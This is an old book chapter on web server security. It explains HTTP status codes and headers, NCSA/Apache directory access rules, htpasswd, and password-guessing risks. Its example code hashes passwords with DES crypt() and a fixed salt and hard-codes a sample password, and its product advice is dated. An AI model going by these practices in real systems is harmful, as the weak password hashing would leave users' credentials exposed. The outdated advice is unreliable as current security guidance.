Chapter 23

Key Web Access and Security Concerns for Webmasters

by Mike Morgan


Security is a complex and controversial subject. Some people view system infiltrators as "freedom fighters of the information age," and some see cracking into systems as a test of technical skill, a cyber-rite of passage. Under most circumstances, however, penetrating a computer system without authorization is a crime. This chapter addresses the nature of the current threat and provides some guidelines for defense.

The first part of the chapter defines some terms and gives an overview of the major security threats. Next, the chapter describes what a local Webmaster can do to keep his or her site secure. Finally, this chapter takes up the topic of security administration, discussing the larger issues of site security, security policy, and security administration tools, to show what a site administrator can do to keep a site safe.

Web Security on the Internet and Intranet

The Internet and its cousins, corporate intranets, are built on a family of protocols known as the Transmission Control Protocol/Internet Protocol (TCP/IP). The heart of TCP/IP is its ability to connect any machine on the Internet to any other by routing packets from one machine to another. You can use the UNIX utility traceroute to see how your machine connects to other machines on the Internet. Suppose you work on a machine named mickey. If you enter

traceroute donald

you might get output like

traceroute to donald.com (--some IP address--), 30 hops max, 40 byte packets
1 minnie (--some IP address--) 20 ms  10 ms  10 ms
2 pluto  (--some IP address--) 120 ms  120 ms  120 ms
3 donald (--some IP address--) 150 ms  140 ms  150 ms

For that particular set of packets, your connection to donald passed through the machines minnie and pluto.

The traceroute output shows that when you pass information around the Net (whether the Internet or a corporate intranet), others attached to the Internet may be able to intercept and read, or even change, the information. How likely is it that you or your organization will be the target of an attack? That's part of what you must determine in establishing your security stance.

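ISO Standard X.509 details nine threats that a computer network might face: identity interception, masquerade, replay, data interception, manipulation, repudiation, denial of service, misrouting, and traffic analysis.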

Most of these attacks can be mounted against either a site on the Internet or an intranet server. Many intranet sites have a firewall, a system that restricts access from machines not on the company's intranet. Just because your site is behind a firewall, don't assume "the natives are friendly." If your site is behind a firewall, great. Use the techniques described in this chapter to harden your site against attack anyway. If someone does manage to penetrate your network security, they will have to deal with still more security at the server level.

This chapter addresses defenses against masquerade and replay attacks, with less emphasis on denial of service and data interception.

Identity interception is a fact of life with most network services. A user can participate in an exchange anonymously using special anonymity servers on the Internet or by spoofing the e-mail system to appear as someone else. HTTP, the Web protocol, does not usually capture a user's name, so personal identity is safer on the Web than with most other services.

Manipulation and repudiation are most easily prevented by using a digital signature system based on public keys. The public key system called Pretty Good Privacy (PGP) is described in this chapter. A different system, called Privacy Enhanced Mail (PEM), is described later in the chapter, in the context of Electronic Data Interchange (EDI). If you are using a commercial server such as Netscape's server products, you can also exchange secure mail and news.

TIP
Many attacks may be thwarted by encrypting data before it is sent and using digital signatures to prove that data was not altered after it was sent. In general, the public domain servers such as NCSA and Apache do not support these features (though a secure version of Apache is available).
Commercial servers, such as Netscape's FastTrack and Enterprise servers, do support a range of encryption and digital signature options. Encryption, digital signatures, and the infrastructure to support them are among the most important reasons to consider a commercial server over a public domain (free) server.
Netscape's latest offering of servers includes a Certificate Server, and all of their servers (not just the Web servers) can be set up to look at the electronic signatures on a user's certificate before deciding whether or not to grant access.

There are no good defenses against misrouting and traffic analysis. If an attacker can gain access to the bitstream (either on the LAN or by grabbing it from the Internet), he or she can change mail headers (most of which are not encrypted) or perform traffic analysis. By using secure e-mail, however, the user can ensure that messages which are misrouted cannot be read by someone other than the intended recipient.

NOTE
This chapter uses the terms "hacker" and "cracker" in their technical sense. Just as the term "gentleman" once had a precise meaning (a male of noble birth), so the term "hacker" was coined to refer to the most productive people in a technical project: people who often worked extremely long hours to add clever technical features. For a detailed history of hackerism as the term is used here, see Steven Levy's excellent book Hackers: Heroes of the Computer Revolution (Dell: 1984). The term "cracker" refers to a person who commits unauthorized penetrations of computer systems. The analogous term "phone phreak" refers to people who make similar penetrations into the telephone system.

Simple Privacy

It's often said, "If you want something kept secret, don't tell anyone." Files served up on the World Wide Web are far from secret. In general, anyone who knows the URL can view the page. From time to time, however, a Webmaster needs a middle ground: files that should be widely available but not available to everyone. For example, assume that a site promotes membership in a club or organization. Promotional materials are available to the general public, but certain files are part of what a member buys when he or she joins, so those files should be available only to members.

Security is not without cost. Figure 23.1 illustrates the fact that one can achieve security only at the expense of ease-of-use and performance. A Webmaster can choose any operating point within this triangle, but cannot be at all three corners simultaneously.

Figure 23.1: A Webmaster can operate a site anywhere within the triangle, but you can't be at all three corners at once!

With few exceptions, every step toward enhanced security is a step away from high performance and usability. Each system administrator, in concert with the Webmasters of the sites on the system, must determine where the acceptable operating points lie. One way to think about the trade-off between security and user issues is to compare the value of the information and service provided by the server to the likely threat. Security analysts often identify six levels of security threat:

  1. Casual users  These people might inadvertently compromise security.
  2. Curious users  These people are willing to explore the system but are unwilling to break the law.
  3. Greedy users  These people are willing to divulge information for financial gain but are unwilling to break the law.
  4. Criminals  These people are willing to break the law.
  5. Well-financed criminals  These people have access to sophisticated tools.
  6. Foreign governments  These people have essentially unlimited resources.

For most systems, the value of the information and service justifies securing the system against at least the first two or three levels of threat. No system openly available on the Internet can withstand a concerted attack from the highest levels of threat. In the late '80s, computer security experts agreed that most attacks came from curious or greedy users, often the technically gifted teenagers stereotyped by the movie WarGames. These days, however, experts widely agree that the threat has grown more sophisticated. Attacks now are often committed by an uberhacker who is technically skilled, well-funded, and has strong motives for attacking a system. Indeed, the U.S. government has studied the topic of information warfare, a term that refers to the exploitation by a hostile government of computer infrastructure resources such as those operated by banks, telephone companies, and transportation companies.

This chapter presents a series of security solutions, ranging from simple user authentication systems sufficient to keep out the casual user who might inadvertently compromise security, to fairly expensive systems that raise the cost of penetration high enough that potential infiltrators need good funding to succeed.

See the section on Security Administration Tools later in this chapter to learn some techniques that might deter, or at least detect, the uberhacker.

How Do Users Access Your Server?

Anyone who has entered a URL has wondered about the letters "http" and why they're omnipresent on the Web. HTTP, the Hypertext Transfer Protocol, is a series of handshakes exchanged between a browser like Netscape and the server.

There are many different servers. CERN, a research center in Switzerland that did the original development of the Web, has one. So does the National Center for Supercomputing Applications, or NCSA, which did much of the early work on the graphical portions of the Web. Netscape Communications sells two Web servers, one (called FastTrack) targeted for general use and one (called Enterprise) targeted for the intranet market. The one thing all Web servers have in common is that they speak HTTP.

The definitive description of HTTP is found at

http://www.ics.uci.edu/pub/ietf/http/

This directory contains detailed memos from the HTTP Working Group of the Internet Engineering Task Force. The latest version, HTTP 1.1, and its predecessor, HTTP 1.0, are the standards for how all communication is done over the Web.

Communication on the Internet takes place using a set of protocols named TCP/IP, which stands for Transmission Control Protocol/Internet Protocol. Think of TCP/IP as similar to the telephone system, and HTTP as a conversation between two people over the phone.

The Request  When a user enters a URL such as http://www.xyz.com/index.html, the TCP/IP software on the user's machine talks to the network name servers to find out the IP address of the xyz.com server. TCP/IP then opens a conversation with the machine named www at that domain. TCP/IP defines a set of ports on a server, each of which provides some service. By default, the HTTP server (commonly named httpd) is listening on port 80.
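As a rough illustration of the lookup just described, the following Python sketch splits a URL into the pieces a browser needs: the host to resolve, the port to connect to, and the path to request. The helper name split_url is hypothetical; the fallback to port 80 mirrors the default mentioned in the text.

```python
from urllib.parse import urlsplit

DEFAULT_HTTP_PORT = 80  # the port httpd listens on by default


def split_url(url):
    """Return (host, port, path) for an http URL."""
    parts = urlsplit(url)
    host = parts.hostname
    port = parts.port or DEFAULT_HTTP_PORT  # no explicit port: use 80
    path = parts.path or "/"                # no path: ask for the root
    return host, port, path


print(split_url("http://www.xyz.com/index.html"))
```

The host is what gets handed to the name servers; the path is what appears in the request line.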

The client software (a browser like Netscape Navigator) starts the conversation. To get the file named index.html from www.xyz.com, the browser says the following:

GET /index.html HTTP/1.0

This instruction is followed by a carriage return and a line feed, denoted by <CRLF>.

Formally, index.html is an instance of a uniform resource identifier (URI). A uniform resource locator (URL) is a type of URI.

NOTE
There are provisions in the Web specifications for identifiers to specify a particular document, regardless of where that document is located. There are also provisions that allow a browser to recognize that two documents are different versions of the same original, differing in language, perhaps, or in format (for example, one might be plain text, and another might be in PDF). For now, most servers and browsers know about only one type of URI, the URL.

The GET method asks the server to return whatever information is indicated by the URI. If the URI represents a file (like index.html), then the contents of the file are returned. If the URI represents a process (like Formmail.cgi), then the server runs the process and sends the output.

Most commonly, the URI is expressed in terms relative to the document root of the server. For example, the server might be configured to serve pages starting at

/usr/local/etc/httpd/htdocs

If the user wants a file, for instance, whose full path is

/usr/local/etc/httpd/htdocs/hypertext/WWW/TheProject.html

the client sends the following instruction:

GET /hypertext/WWW/TheProject.html HTTP/1.0

The HTTP/1.0 at the end of the line indicates to the server what version of HTTP the client is able to accept. As the HTTP standard evolves, this field will be used to provide backward compatibility with older browsers.
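The mapping from a file's full path to the request line can be sketched in a few lines of Python. This is only an illustration: the function name request_line is hypothetical, and the document root is the example value used above, not a required location.

```python
import posixpath

DOCUMENT_ROOT = "/usr/local/etc/httpd/htdocs"  # example root from the text


def request_line(full_path, document_root=DOCUMENT_ROOT, version="HTTP/1.0"):
    """Build the GET request line for a file under the document root."""
    relative = posixpath.relpath(full_path, document_root)
    if relative == ".." or relative.startswith("../"):
        raise ValueError("file is outside the document root")
    if relative == ".":
        relative = ""  # the document root itself is requested as "/"
    # The request line ends with a carriage return and a line feed.
    return "GET /" + relative + " " + version + "\r\n"


print(request_line(DOCUMENT_ROOT + "/hypertext/WWW/TheProject.html"), end="")
```

Refusing paths that fall outside the document root reflects the fact that the server serves pages only from that tree.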

The Response  When the server gets a request, it generates a response. The response a client wants usually looks something like the following:

HTTP/1.0 200 OK
Date: Mon, 19 Feb 1996 17:24:19 GMT
Server: Apache/1.0.2
Content-type: text/html
Content-length: 5244
Last-modified: Tue, 06 Feb 1996 19:23:01 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.0//EN">
<HTML>
<HEAD>
.
.
.
</BODY>
</HTML>

The first line is called the status line. It contains three elements, separated by spaces: the HTTP version, the status code, and the reason phrase.

When the server is able to find and return an entity associated with the requested URI, it returns status code 200, which has the reason phrase OK.

The first digit of the status code defines the class of response. Table 23.1 lists the five classes.

Table 23.1  HTTP Servers Respond to a Request with a Response Status Code that Belongs to One of These Five Classes

Code  Class          Meaning
1xx   Informational  These codes are not used but are reserved for future use.
2xx   Success        The request was successfully received, understood, and accepted.
3xx   Redirection    Further action must be taken to complete the request.
4xx   Client error   The request contained bad syntax or could not be fulfilled through no fault of the server.
5xx   Server error   The server failed to fulfill an apparently valid request.
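To make the structure of the status line concrete, here is a minimal Python sketch that splits a status line into its parts and looks up the class from the first digit of the code, following Table 23.1. The names parse_status_line and STATUS_CLASSES are illustrative only.

```python
STATUS_CLASSES = {
    "1": "Informational",
    "2": "Success",
    "3": "Redirection",
    "4": "Client error",
    "5": "Server error",
}


def parse_status_line(line):
    """Split a status line into (version, code, reason phrase, class)."""
    # Split on the first two spaces only; the reason phrase may contain spaces.
    version, code, reason = line.rstrip("\r\n").split(" ", 2)
    return version, int(code), reason, STATUS_CLASSES.get(code[0], "Unknown")


print(parse_status_line("HTTP/1.0 200 OK"))
```

Because only the first digit determines the class, a client can react sensibly even to a code it has never seen.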

Table 23.2 shows the individual values of all status codes presently in use, and a typical reason phrase for each code. These phrases are given as examples in the standard; each site or server can replace these phrases with local equivalents.

Table 23.2  Status Codes and Reason Phrases

Status Code  Reason Phrase
200          OK
201          Created
202          Accepted
203          Partial Information
204          No Content
301          Moved Permanently
302          Moved Temporarily
303          Method
304          Not Modified
400          Bad Request
401          Unauthorized
402          Payment Required
403          Forbidden
404          Not Found
500          Internal Server Error
501          Not Implemented
502          Server Temporarily Overloaded (Bad Gateway)
503          Server Unavailable (Gateway Timeout)

The most common responses are 200, 204, 302, 401, 404, and 500. These and other status codes are discussed more fully in the document located at

http://www.w3.org/pub/WWW/Protocols/HTTP/HTRESP.html

We have already described code 200. It means the request has succeeded and data is coming.

Code 204 means the document has been found but is completely empty. This code is returned if the developer has associated an empty file with a URL, perhaps as a placeholder. The most common browser response when code 204 is returned is to leave the current data on-screen and put up an alert dialog box that says Document contains no data or something to that effect.

When a document has been moved, a code 3xx is returned. Code 302 is most commonly used when the URI is a Common Gateway Interface (CGI) script that outputs something like the following:

Location: http://www.xyz.com/newPage.html

Typically, this line is followed by two line feeds. Most browsers recognize code 302, and look in the Location: line to see which URL to retrieve; they then issue a GET to the new location. Chapter 31, "The Common Gateway Interface," contains details about outputting Location: from a CGI script.
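A script that produces this output can be very small. The following Python sketch is one hedged way to write it; the function name redirect_response is hypothetical, and the check for embedded line breaks is an added precaution, not something the CGI convention itself requires.

```python
def redirect_response(url):
    """Return the CGI output that asks the server to issue a redirect."""
    if "\r" in url or "\n" in url:
        # A line break inside the URL would let a caller inject extra headers.
        raise ValueError("URL must not contain line breaks")
    # The second line feed produces the blank line that ends the headers.
    return "Location: " + url + "\n\n"


print(redirect_response("http://www.xyz.com/newPage.html"), end="")
```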

Status code 401 is seen when the user accesses a protected directory. The response includes a WWW-Authenticate header field with a challenge. Typically, a browser interprets a code 401 by giving the user an opportunity to enter a username and password. The section "Built-In Server Access Control," later in this chapter, contains details on protecting a Web site.

Status code 402 has some tantalizing possibilities. So far it has not been implemented in any common browsers or servers. Chapter 34, "Transactions and Order Taking," describes some methods that are in common use, allowing the site owner to collect money.

When working on new CGI scripts, the developer frequently sees code 500. The most common explanation of code 500 is that the script has a syntax error, or is producing a malformed header. Chapter 31, "The Common Gateway Interface," describes how to write CGI scripts to avoid error 500.

Other Requests  The preceding examples involved GET, the most common request. A client can also send requests involving HEAD, POST, and conditional GET.

The HEAD request is just like the GET request, except no data is returned. HEAD can be used by special programs called proxy servers to test URIs to see if an updated version is available or just to ensure that the URI is available.

POST is like GET in reverse. POST is used to send data to the server. Developers use POST most frequently when writing CGI scripts to handle form output.

Typically, a POST request brings a code 200 or code 204 response.

Requests Through Proxy Servers  Some online services, such as America Online, and some intranets set up machines to be proxy servers. A proxy server sits between the client and the real server. When the client sends a GET request, for example, to www.xyz.com, the proxy server checks to see if it has the requested data stored locally. This local storage is called a cache.

If the requested data is available in the cache, the proxy server determines whether to return the cached data or the version that's on the real server. This decision usually is made on the basis of time-if the proxy server has a recent copy of the data, it can be more efficient to return the cached copy.

To find out whether the data on the real server has been updated, the proxy server can send a conditional GET, like the following:

GET /index.html HTTP/1.0
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT <CRLF>

If the request would not normally succeed, the response is the same as if the request were a GET. The request is processed as a GET if the date is invalid (including a date that's in the future). The request also is processed as a GET if the data has been modified since the specified date. If the data has not been modified since the requested date, the server returns status code 304 (Not Modified).

If the proxy server sends a conditional GET, either it gets back data or it doesn't. If it gets data, it updates the cache copy. If it gets code 304, it sends the cached copy to the user. If it gets any other code, it passes that code back to the client.
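The server's side of the conditional GET can be sketched as follows. This is an illustration of the rules above, not the code of any particular server: the function name conditional_get_status is hypothetical, and last_modified is assumed to be a timezone-aware datetime supplied by the caller.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def conditional_get_status(if_modified_since, last_modified, now=None):
    """Return 304 if the entity is unchanged since the given date, else 200."""
    now = now or datetime.now(timezone.utc)
    try:
        since = parsedate_to_datetime(if_modified_since)
    except (TypeError, ValueError):
        return 200  # invalid date: process as a plain GET
    if since.tzinfo is None:
        since = since.replace(tzinfo=timezone.utc)  # HTTP dates are GMT
    if since > now:
        return 200  # date in the future: process as a plain GET
    return 200 if last_modified > since else 304


modified = datetime(1996, 2, 6, 19, 23, 1, tzinfo=timezone.utc)
print(conditional_get_status("Sat, 29 Oct 1994 19:43:31 GMT", modified))
```

A proxy that receives 304 serves its cached copy; one that receives 200 replaces the cached copy with the new data.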

Header Fields  If-Modified-Since is an example of a header field. There are four types of header fields: general headers, request headers, response headers, and entity headers.

General headers may be used on a request or on the data. Data can flow both ways. On a GET request, data comes from the server to the client. On a POST request, data goes to the server from the client. In either case, the data is known as the entity.

The three general headers defined in the standard are Date, MIME-Version, and Pragma.

By convention, the server should send its current date with the response. By the standard, only one Date header is allowed.

Although HTTP does not conform to the MIME standard, it is useful to report content types using MIME notation. To avoid confusion, the server may send the MIME version that it uses. MIME version 1.0 is the default.

Optional behavior can be described in Pragma directives. HTTP/1.0 defines the no-cache directive on request messages, to tell proxy servers to ignore their cached copy and GET the entity from the server.

Request header fields are sent by the browser software. In HTTP/1.0, the request header fields are Authorization, From, If-Modified-Since, Referer, and User-Agent.

Referer can be used by CGI scripts to determine the preceding link. For example, if Susan announces Bob's site to a major real estate listing, she can keep track of the Referer variable to see how often users follow that link to get to Bob's site.

User-Agent is sent by the browser to report what software and version the user is running. This field ultimately appears in the HTTP_USER_AGENT CGI variable and can be used to return pages with browser-specific code.

Response header fields appear in server responses and can be used by the browser software. The valid response header fields are Location, Server, and WWW-Authenticate.

Location is the same "Location" mentioned earlier in this chapter, in the "The Response" section. Most browsers expect to see a Location field in a response with a 3xx code, and interpret it by requesting the entity at the new location.

Server gives the name and version number of the server software.

WWW-Authenticate is included in responses with status code 401. The syntax is

WWW-Authenticate: 1#challenge

The browser reads the challenge(s), of which there must be at least one, and asks the user to respond. Most popular browsers handle this process with a dialog box prompting the user for a username and password. The "Built-In Server Access Control" section later in this chapter describes the authentication process in more detail.

Entity header fields contain information about the data. Recall that the data is called the entity; information about the contents of the entity body, or meta-information, is sent in entity header fields. Much of this information can be supplied in an HTML document using the <META> tag.

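The entity header fields defined in HTTP/1.0 include Allow, Content-Encoding, Content-Length, Content-Type, Expires, and Last-Modified.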

In addition, new field types can be added to an entity without extending the protocol. It's up to the author to determine what software (if any) will recognize the new type. Client software ignores entity headers that it doesn't recognize.

The Expires header is used as another mechanism to keep caches up-to-date. For example, an HTML document might contain the following line:

<META HTTP-EQUIV="Expires" CONTENT="Thu, 01 Dec 1994 16:00:00 GMT">

This means that a proxy server should discard the document at the indicated time and should not send out data after that time.

NOTE
The exact format of the date is specified by the standard, and the date must always be in Greenwich Mean Time (GMT).
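A cache's use of the Expires value can be sketched like this. The function name is_expired is hypothetical, and treating an unreadable date as already expired is an assumption of this sketch (it errs on the side of fetching a fresh copy).

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def is_expired(expires_value, now=None):
    """Return True if a cached copy should no longer be served."""
    now = now or datetime.now(timezone.utc)
    try:
        expires = parsedate_to_datetime(expires_value)
    except (TypeError, ValueError):
        return True  # assumption: an unreadable date means the copy is stale
    if expires.tzinfo is None:
        expires = expires.replace(tzinfo=timezone.utc)  # dates are in GMT
    return now >= expires


print(is_expired("Thu, 01 Dec 1994 16:00:00 GMT"))
```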

Built-In Server Access Control

The easiest way to protect files is to use the access control mechanisms built into NCSA, Apache, and similar UNIX servers. These techniques are not powerful, and they can be foiled with very little effort. Nevertheless, they're easy to implement, and they keep confidential files away from most casual browsers.

TIP
The Netscape Web servers (FastTrack and Enterprise) as well as the new Netscape Orion technology provide security capabilities well in excess of those available in NCSA and its kin. If your site needs pinpoint control over access, check out the Netscape products. Also, if you need to run on a Windows NT platform instead of UNIX, you will want to look at the Netscape and Microsoft products.
For more information on the Netscape servers, see Running a Perfect Netscape Site (Que, 1996). Microsoft's entry, Microsoft Internet Information Server, is described in Running a Perfect Web Site with Windows (Que, 1996).

access.conf  The NCSA server looks for a file named access.conf in the configuration directory. The following are two typical entries for access.conf:

<Directory /usr/local/etc/httpd/htdocs/morganm>
  <Limit GET>
  order allow,deny
  allow from all
  </Limit>
</Directory>
<Directory /usr/local/etc/httpd/htdocs/ckepilino>
  <Limit GET>
  order deny,allow
  deny from all
  allow from dse.com
  </Limit>
</Directory>

These entries tell the server who has access to the morganm and ckepilino directories, respectively. The first line of each entry names the directory. The next line shows that GET requests are restricted. The order directive specifies the order in which allow and deny directives should be applied. In the first example, GET requests are allowed to the morganm directory from any domain and denied from none. In the second example, the deny directive is applied first, so access is not allowed from anywhere. Then the allow directive is invoked, allowing access to the ckepilino directory only from dse.com, as an exception to the general denial rule.
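The effect of the order directive can be modeled in a few lines of Python. This is a simplified sketch of the logic described above, not the server's actual implementation; the function names are hypothetical, and the default applied when no directive matches is an assumption (check your server documentation).

```python
def host_matches(host, pattern):
    """True if pattern is 'all' or names the host or its parent domain."""
    host, pattern = host.lower(), pattern.lower()
    return pattern == "all" or host == pattern or host.endswith("." + pattern)


def access_allowed(host, order, allow=(), deny=()):
    """Apply the allow and deny lists in the given order; the last match wins."""
    allow_hit = any(host_matches(host, p) for p in allow)
    deny_hit = any(host_matches(host, p) for p in deny)
    if order == "deny,allow":
        allowed = True            # assumed default when nothing matches
        if deny_hit:
            allowed = False       # deny directives are applied first
        if allow_hit:
            allowed = True        # allow directives carve out exceptions
        return allowed
    if order == "allow,deny":
        allowed = False           # assumed default when nothing matches
        if allow_hit:
            allowed = True        # allow directives are applied first
        if deny_hit:
            allowed = False       # deny directives carve out exceptions
        return allowed
    raise ValueError("unknown order: " + order)


print(access_allowed("www.dse.com", "deny,allow", allow=["dse.com"], deny=["all"]))
```

With the ckepilino settings, a host inside dse.com is admitted and every other host is refused, which matches the description of the second entry.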

.htaccess  You can place the same entries shown earlier in access.conf in a file named .htaccess in the directory you want protected. This approach decentralizes access control. Instead of requiring the site Webmaster to manage access.conf, this approach allows each directory owner to set up localized security. To restrict access to the ckepilino directory, for example, make a file named .htaccess (notice the period before the name; this makes the file invisible to casual browsers). Put the following lines in the file:

<Limit GET>
  order deny,allow
  deny from all
  allow from dse.com
</Limit>

The same mechanism can be used to limit POST as well as GET.

User Authentication  The next step in site protection is user authentication. For example, to restrict access to the morganm directory to the specific users jean, chris, and mike, put the following lines in the access.conf file:

<Directory /usr/local/etc/httpd/htdocs/morganm>
  Options Indexes FollowSymlinks
  AllowOverride None
  AuthUserFile /usr/local/etc/httpd/conf/.htpasswd
  AuthGroupFile /dev/null
  AuthName By Secret Password Only!
  AuthType Basic
  <Limit GET>
    require user jean
    require user chris
    require user mike
  </Limit>
</Directory>

To do the same thing using an .htaccess file, use the following lines:

AuthUserFile /home/morganm/.htpasswd
AuthGroupFile /dev/null
AuthName By Secret Password Only!
AuthType Basic
<Limit GET>
  require user jean
  require user chris
  require user mike
</Limit>

In both cases, AuthUserFile specifies the absolute pathname to the password file. The location of this file is unimportant, as long as it's outside the Web site's document tree. The AuthGroupFile directive is set to /dev/null, a way of saying that this directory does not use group authentication. The AuthName and AuthType directives are required and are set to the only options currently available in the NCSA server.

htpasswd  To create the password file that's specified by AuthUserFile, run the program htpasswd. This program does not always come with the server installation kit but is available from the same source. It must be compiled locally.

To run htpasswd the first time, type something like the following:

htpasswd -c /home/morganm/.htpasswd jean

The -c option creates a new password file with the specified pathname. The username (in this case, jean) specifies the first user to be put into the file. htpasswd responds by prompting for the password.

Your subsequent calls to htpasswd should omit the -c option:

htpasswd /home/morganm/.htpasswd chris
htpasswd /home/morganm/.htpasswd mike

Once the password file is in place, it's easy to tell the server to read (or reread) the file. On UNIX, run the following command:

ps -ef | grep httpd

NOTE
On some versions of UNIX, use ps -aux instead of ps -ef as the first command.

This command lists all the current copies of the Web server, something like the following:

root    9514     1  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody  9772  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody 11568  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody 11822  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody 12084  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody 12338  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd

Look for the one that begins with root. Its process ID is used as the parent process ID of all the other copies. Note the process ID of that parent copy. For this example, it's 9514. Once you've obtained this number, enter the following line:

kill -HUP 9514

This command sends a hang-up signal (SIGHUP) to the server daemon. For most processes, the hang-up signal tells the process that an interactive user, dialed in by modem, has hung up. Daemons, of course, have no interactive users (at least not the sort who can get to them by modem), but by convention, sending SIGHUP to a daemon tells it to reread its configuration files. When the parent copy of httpd rereads access.conf, it learns about the new restrictions and starts enforcing them.
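The two manual steps (find the parent process, then signal it) can be combined in a short Python sketch. The function names are hypothetical, the parsing assumes the ps -ef column layout shown above (user first, process ID second, command last), and send_hangup works only on UNIX-like systems.

```python
import os
import signal


def parent_httpd_pid(ps_output):
    """Return the PID of the root-owned httpd process, or None."""
    for line in ps_output.splitlines():
        fields = line.split()
        if len(fields) < 2 or "grep" in fields:
            continue  # skip blank lines and the grep command itself
        if fields[0] == "root" and fields[-1].endswith("httpd"):
            return int(fields[1])
    return None


def send_hangup(pid):
    """Ask the daemon to reread its configuration (same as kill -HUP)."""
    os.kill(pid, signal.SIGHUP)


SAMPLE = """\
root    9514     1  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
nobody  9772  9514  0 16:55:45  -  0:00 /usr/local/etc/apache/src/httpd
"""
print(parent_httpd_pid(SAMPLE))
```

Calling send_hangup with the returned process ID requires the same privileges as running kill -HUP by hand.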

You can use similar techniques to set up authenticating groups, but requirements for group authentication are less common. See your server documentation if you want details.

Password-Protection Scripts

The built-in access control mechanisms are easy to set up and offer security against casual threats; however, they will not resist a determined attack. Anyone with certain types of network monitoring equipment can read the username and password out of the packets. If there's an Ethernet LAN close to the server, for example, an Ethernet card can be put into "promiscuous mode" and told to read all traffic off the network. For even lower cost, a determined cracker can often guess enough passwords to penetrate most sites. Some servers honor a GET request for .htaccess, giving the cracker knowledge of where the password file is kept. Even though the passwords are encrypted, methods exist to guess many passwords. Software is available to try every word in the dictionary in just a few minutes. A brute force search involving every word of six or fewer characters takes under an hour. Compromise of a site does not require compromise of every account; one is enough. Studies have found that, before users are taught how to choose and change passwords, as many as 50% of the passwords on a site fall victim to a simple cracking program. After training, about 25% of the passwords are still vulnerable.
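To see why sniffed packets are so dangerous under Basic authentication, note that the browser sends the username and password merely base64-encoded, not encrypted. The following Python sketch shows how little work an eavesdropper needs to do; the function name is hypothetical and the password is made up for the example.

```python
import base64


def decode_basic_credentials(header_value):
    """Recover (username, password) from a Basic Authorization value."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    decoded = base64.b64decode(encoded.strip()).decode("latin-1")
    username, _, password = decoded.partition(":")
    return username, password


# What an eavesdropper would capture for user "jean" (made-up password).
sniffed = "Basic " + base64.b64encode(b"jean:OverTheRiver").decode("ascii")
print(decode_basic_credentials(sniffed))
```

No key or guessing is involved: anyone who can read the header can read the password.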

Rules for choosing good passwords can be built into software. A password should be long (eight characters or more) and should not be any word appearing in a dictionary or related at all to the user's personal information. A password should not be the same as the username or the same as any of the computer vendor's default passwords. The password should be entered in mixed case or, better yet, with punctuation or numbers mixed in. Every user should change passwords regularly, and when a new password is chosen, it should not be too similar to the old password.

passwd+ is designed to replace the UNIX system's standard password maintenance program (/bin/passwd). It catches and rejects passwords following certain patterns; for example, it rejects many for being too short or matching a dictionary word. Many newer versions of UNIX have incorporated logic similar to passwd+ into their own version of passwd; for Web site password protection, logic similar to passwd+ certainly could be incorporated.
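A few of the rules for choosing passwords can be expressed directly in code. The Python sketch below is an illustration only, not the logic of passwd+ itself: the function name is hypothetical, the dictionary is whatever word list the caller supplies, and "too similar to the old password" is approximated as "identical when case is ignored."

```python
import string

MIN_LENGTH = 8  # "eight characters or more"


def password_problems(password, username, dictionary=(), old_password=None):
    """Return the reasons to reject a password; an empty list means it passes."""
    problems = []
    lowered = password.lower()
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    if lowered == username.lower():
        problems.append("same as username")
    if lowered in {word.lower() for word in dictionary}:
        problems.append("dictionary word")
    mixed_case = (any(c.islower() for c in password)
                  and any(c.isupper() for c in password))
    has_other = any(c in string.digits + string.punctuation for c in password)
    if not (mixed_case or has_other):
        problems.append("needs mixed case, digits, or punctuation")
    # Assumption: "too similar" is approximated as equal when case is ignored.
    if old_password is not None and lowered == old_password.lower():
        problems.append("too similar to old password")
    return problems


print(password_problems("jones", "jones"))
```

Returning a list of reasons, instead of a simple yes or no, lets a password-change form tell the user what to fix.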

It's important to make sure that passwords are written to the disk in encrypted form, and that the file holding the passwords is read-protected. The following three listings provide the basis for a simple password protection system. Like .htaccess, this system is vulnerable to network sniffing and replay. Unlike .htaccess, however, this system can be extended to include passwd+-style logic so that the passwords hold up better against crackers.

NOTE
If you're not familiar with CGI scripting, you might want to skip this section until you've read Chapter 31. If you're new to Perl, be sure to read Teach Yourself Perl 5 in 21 Days, Second Edition (Sams, 1996).

The CD-ROMs that accompany this book contain login.cgi. Connect an HTML form to login.cgi and use it to collect usernames and passwords. If a user presents a valid name and password, the script redirects that user to a file in the protected subdirectory. If the user is the site owner (as evidenced by $LEVEL being equal to two), the script redirects to the addUser.html page instead.

User passwords are maintained with the script named addUser.cgi, also available on the CD-ROMs. When login.cgi recognizes the site owner and sends them to addUser.html, they supply the data for the new user.

To get started, write a one-line Perl program to encrypt a password. For example, if you want your password to be OverTheRiver, run the script in Listing 23.1.


Listing 23.1  Starter.pl: Use This Little Script to Generate the First Password
#!/usr/local/bin/perl
# By Michael Morgan, 1995
# Encrypt the plaintext password with crypt(); 'ZZ' is the two-character salt.
$encryptedPassword = crypt("OverTheRiver", 'ZZ');
print "$encryptedPassword\n";
exit;

You get a reply like the following (the actual characters may vary):

ZZe/eiKRvN/k.

Copy the encrypted password into the owner's line in the password file. After that, delete the program from the disk.

Each line of the password file should look similar. If the owner of the files is named Jones, for example, the owner's line might read as follows:

jones:ZZe/eiKRvN/k.:1:2:I. M. Jones, (804) 555-1212, (804) 555-2345, jones@xyz.com

Once the first line of the file has been built by hand, the owner can add subsequent users by using the script.

If a cracker can get a copy of the password file, then he can run CRACK or more sophisticated password crackers against it. Make sure that the password file is outside the document tree, forcing the cracker to test password guesses online. Next, add a counter to the preceding script so that repeated attempts to access a user ID will disable that account and notify the system administrator.
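
The counter described above might look something like the following Python sketch. It is not part of login.cgi; the class name, the threshold, and the notification hook are assumptions, and a real CGI script would have to keep the counts in a file or database because each request runs in a fresh process.

```python
class LoginThrottle:
    """Track failed logins per user ID and disable the account after too many."""

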